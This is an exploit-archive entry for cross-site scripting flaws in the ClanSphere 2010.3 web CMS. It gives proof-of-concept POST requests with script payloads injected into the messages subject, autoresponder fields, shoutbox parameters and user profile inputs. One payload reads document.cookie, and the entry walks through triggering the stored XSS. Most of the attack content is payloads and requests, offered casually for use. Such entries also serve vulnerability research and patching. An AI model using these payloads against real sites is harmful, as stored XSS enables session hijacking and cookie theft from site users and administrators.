ClanSphere 2010.3 Xss Vulnerability

2011-02-24T00:00:00
ID 1337DAY-ID-15469
Type zdt
Reporter lemlajt
Modified 2011-02-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # author: lemlajt
# software : Clansphere @ sourceforge.net
# version: 2010_3
# tested on: linux
# cve :
#

 
xss-01 PoC :

POST http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=create

$messages_subject=<body onload=alert('yo')>

xss-02 Stored PoC:

a. post http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=autoresponder
$autoresponder_subject=">">body onload=alert(document.cookie)>
$autoresponder_text=">could.be.here.2>

b. 'Preview'.
c. enjoy

Better: This is stored xss:

We see this message in our mailbox, and there is
"><script>bla... in let's say: 'clear text'.

So we decide to delete this 3v1l msg from our mail's! 
--> [remove]
and this is it, stored xss is here;]

output src:
<td class="leftb">Really delete message <strong>"><body onload=alert('yo')></strong> ?</td>
;]

btw: stored xss is also when you add "><script>tag</script> to few inputs in user profile.
then save it, and go to edit again. and here you have another xss.

* bonus:
index.php?mod=shoutbox&action=create   ( put "><script>)
$sh_nick
$sh_text2



#  0day.today [2018-03-01]  #